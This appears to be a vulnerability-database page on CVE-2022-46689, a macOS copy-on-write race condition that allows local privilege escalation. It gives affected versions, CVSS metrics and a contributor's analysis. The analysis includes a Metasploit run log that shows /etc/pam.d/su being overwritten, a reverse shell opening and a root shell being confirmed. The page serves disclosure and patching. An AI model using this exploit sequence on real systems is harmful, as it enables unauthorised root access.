Attacker Value
High
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Local
1

CVE-2022-46689

Disclosure Date: December 15, 2022
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.

Add Assessment

1
Ratings
Technical Analysis

Description

This vulnerability is the macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root. The vulnerability on linux is described as: “A race condition was found in the way the kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.”

Attacker Value & Exploitation

This issue was fixed in:

  • tvOS 16.2
  • macOS Monterey 12.6.2
  • macOS Ventura 13.1
  • macOS Big Sur 11.7.2
  • iOS 15.7.2
  • iPadOS 15.7.2
  • iOS 16.2
  • iPadOS 16.2
  • watchOS 9.2.

Numerous recent versions of Apple products affected makes this quite valuable for attackers. It’s not everyday we see such a reliable LPE in current versions of macOS. The vuln requires user authentication to exploit and would pair nicely with a successful phishing attempt to compromise an entire macOS environment. A metasploit module has been released for this vuln making exploitation trivial, be sure to patch!

msf6 exploit(osx/local/mac_dirty_cow) > run
[*] Started reverse TCP handler on 172.16.199.1:4446
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.wNDx86' (17204 bytes) ...
[*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ...
[*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[*] Running cmd:
echo '/tmp/.wNDx86 & disown' | su
[*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[+] Deleted /tmp/.wNDx86
[+] Deleted /tmp/.aclP0u
[+] Deleted /tmp/.DfoZanro
[+] Deleted /tmp/.TKIGnTw0l
[*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500
options
/bin/sh: line 29: options: command not found
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
uname -a
Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64
CVSS V3 Severity and Metrics
Base Score:
7.0 High
Impact Score:
5.9
Exploitability Score:
1
Vector:
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
High
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • apple

Products

  • ipados,
  • iphone os,
  • macos,
  • safari,
  • tvos,
  • watchos

References

Exploit
PoCs that have not been added by contributors directly have been sourced from: nomi-sec/PoC-in-GitHub.
A PoC added here by the AKB Worker must have at least 2 GitHub stars.

Additional Info

Technical Analysis